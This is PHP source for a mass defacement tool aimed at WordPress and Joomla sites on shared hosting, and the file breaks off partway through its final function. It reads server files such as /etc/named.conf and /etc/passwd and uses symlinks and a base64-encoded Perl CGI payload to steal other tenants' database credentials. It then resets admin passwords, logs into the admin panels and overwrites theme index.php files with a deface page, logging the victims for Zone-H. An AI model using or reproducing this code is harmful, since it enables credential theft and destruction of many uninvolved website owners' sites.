[PHP] Priv8 Wordpress& Joomla Mass Defacer
<?php
error_reporting(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[$i]);
return trim($ar1[0]);
}
function randomt() {
$chars = "abcdefghijkmnopqrstuvwxyz023456789";
srand((double)microtime()*1000000);
$i = 0;
$pass = '';
while ($i <= 7) {
$num = rand() % 33;
$tmp = substr($chars, $num, 1);
$pass = $pass . $tmp;
$i++;
}
return $pass;
}
function index_changer_wp($conf, $content) {
$output = '';
$dol = '$';
$go = 0;
$username = entre2v2($conf,"define('DB_USER', '","');");
$password = entre2v2($conf,"define('DB_PASSWORD', '","');");
$dbname = entre2v2($conf,"define('DB_NAME', '","');");
$prefix = entre2v2($conf,$dol."table_prefix = '","'");
$host = entre2v2($conf,"define('DB_HOST', '","');");
$link=mysql_connect($host,$username,$password);
if($link) {
mysql_select_db($dbname,$link) ;
$dol = '$';
$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
} else {
$output.= "[-] DB Error<br />";
}
if($req1) {
$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url=$data["option_value"];
$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
$data = mysql_fetch_array($req);
$template = $data["option_value"];
$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
$data = mysql_fetch_array($req);
$current_theme = $data["option_value"];
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/wp-login.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
$pos = strpos($buffer,"action=logout");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
$go = 1;
}
if($go) {
$cond = 0;
$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);
$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
if(substr_count($_file,"/index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Updated Successfuly<br />";
$hk = explode('public_html',$_file);
$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
$cond = 1;
}
} else {
$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);
$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
if(substr_count($_file,"index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Template Updated Successfuly<br />";
$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
$cond = 1;
}
} else {
$output.= "[-] index.php can not load in Theme Editor<br />";
}
}
}
} else {
$output.= "[-] DB Error<br />";
}
global $base_path;
unlink($base_path.'COOKIE.txt');
return array('cond'=>$cond, 'output'=>$output);
}
function index_changer_joomla($conf, $content, $domain) {
$doler = '$';
$username = entre2v2($conf, $doler."user = '", "';");
$password = entre2v2($conf, $doler."password = '", "';");
$dbname = entre2v2($conf, $doler."db = '", "';");
$prefix = entre2v2($conf, $doler."dbprefix = '", "';");
$host = entre2v2($conf, $doler."host = '","';");
$co=randomt();
$site_url = "http://".$domain."/administrator";
$output = '';
$cond = 0;
$link=mysql_connect($host, $username, $password);
if($link) {
mysql_select_db($dbname,$link) ;
$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
} else {
$output.= "[-] DB Error<br />";
}
if($req1){
if ($req) {
$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];
$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
$data = mysql_fetch_array($req);
$template_id = $data["extension_id"];
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
if($return && $hidden) {
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_REFERER, $url2);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}
if($pos){
$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
if($hidden2) {
$output.= "[+] index.php file found in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}
if($hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'<dd class="message message">');
$cond = 0;
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond = 1;
}
}
}
else {
$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
if($hidden) {
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$pos = strpos($buffer,"com_config");
if($pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}
if($pos) {
$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
if($hidden2) {
$output.= "[+] index.php file founded in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}
if($hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'<dd class="message message fade">');
$cond = 0;
if($pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond = 1;
}
}
}
} else {
$output.= "[-] DB Error<br />";
}
global $base_path;
unlink($base_path.$co);
return array('cond'=>$cond, 'output'=>$output);
}
function exec_mode_1($def_url) {
@mkdir('sym',0777);
$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$fp = @fopen ('sym/.htaccess','w');
fwrite($fp, $wr);
@symlink('/','sym/root');
$dominios = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
$out[1] = array_unique($out[1]);
$numero_dominios = count($out[1]);
echo "Total domains: $numero_dominios <br><br />";
$def = file_get_contents($def_url);
$def = urlencode($def);
$def2 = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cyhcJ2h0dHA6Ly96b25laG1pcnJvcnMubmV0L2RlZmFjZWQvMjAxMy8wMS8xMy9iYWx0c3R1ZGlvLmx0L2luZGV4Lmh0bWxcJyk7DQokcCA9IGV4cGxvZGUoXCdwdWJsaWNfaHRtbFwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uXCdwdWJsaWNfaHRtbFwnOw0KaWYgKCRoYW5kbGUgPSBvcGVuZGlyKCRwKSkgew0KICAgICRmcDEgPSBAZm9wZW4oJHAuXCcvaW5kZXguaHRtbFwnLFwndytcJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLlwnL2luZGV4LnBocFwnLFwndytcJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLlwnL2luZGV4Lmh0bVwnLFwndytcJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICBlY2hvIFwnRG9uZVwnOw0KfQ0KY2xvc2VkaXIoJGhhbmRsZSk7DQp1bmxpbmsoX19GSUxFX18pOw0KPz4=';
$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
$output = fopen('defaced.html', 'a+');
$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
$j = 1;
$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
for($i = $st; $i <= $numero_dominios; $i++)
{
$domain = $out[1][$i];
$dono_arquivo = @fileowner("/etc/valiases/".$domain);
$infos = @posix_getpwuid($dono_arquivo);
if($infos['name']!='root') {
$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count1'] = $_SESSION['count1'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def2);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config03 && preg_match('/DB_NAME/i',$config03)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config03, $def2);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
}
}
echo '</table>';
echo '<hr/>';
echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
if($_SESSION['count1']+$_SESSION['count2'] > 0){
echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
}
}
function exec_mode_2($def_url) {
$domains = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
$out = array_unique($out[1]);
$num = count($out);
print("Total domains: $num<br><br />");
$def = file_get_contents($def_url);
$def = urlencode($def);
$output = fopen('defaced.html', 'a+');
$defaced = '';
$count1 = 0;
$count2 = 0;
echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
$j = 1;
$map = array();
foreach($out as $d) {
$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
$map[$info['name']] = $d;
}
$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
mkdir('plsym',0777);
file_put_contents('plsym/plsym.cc', base64_decode($dt));
chmod('plsym/plsym.cc', 0755);
$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
$fp = @fopen ('plsym/.htaccess','w');
fwrite($fp, $wr);
fclose($fp);
$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
unlink('plsym/plsym.cc');
$data = file_get_contents($url);
preg_match_all('/<a href="(.+)">/', $data, $match);
unset($match[1][0]);
$i = 1;
foreach($match[1] as $m)
{
$mz = explode('##',urldecode($m));
$config01 = '';
$config02 = '';
if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
}
if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
}
$domain = $map[$mz[0]];
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
}
echo '</table>';
echo '<hr/>';
echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
if($count1+$count2 > 0){
echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
}
}
function exec_mode_3($def_url) {
$domains = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
$out = array_unique($out[1]);
$num = count($out);
print("Total domains: $num<br><br />");
$def = file_get_contents($def_url);
$def = urlencode($def);
$output = fopen('defaced.html', 'a+');
$defaced = '';
$count1 = 0;
$count2 = 0;
echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
$j = 1;
$map = array();
foreach($out as $d) {
$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
$map[$info['name']] = $d;
}
$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
mkdir('plsym',0777);
file_put_contents('plsym/data.txt', $_POST['man_data']);
file_put_contents('plsym/plsym.cc', base64_decode($dt));
chmod('plsym/plsym.cc', 0755);
$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
$fp = @fopen ('plsym/.htaccess','w');
fwrite($fp, $wr);
fclose($fp);
$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
unlink('plsym/plsym.cc');
$data = file_get_contents($url);
preg_match_all('/<a href="(.+)">/', $data, $match);
unset($match[1][0]);
$i=1;
foreach($match[1] as $m)
{
$mz = explode('##',urldecode($m));
$config01 = '';
$config02 = '';
if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
}
if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
}
$domain = $map[$mz[0]];
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
}
echo '</table>';
echo '<hr/>';
echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
if($count1+$count2 > 0){
echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
}
}
function submit_zone_h($hacker) {
$items = explode("<br>", trim(str_replace("\n",'',file_get_contents('defaced.html'))));
unset($items[sizeof($items)-1]);
$items = array_unique(str_replace('http://','',$items));
$total = count($items);
echo '<h3 style="text-align: center;">Checking Defaced sites</h3>';
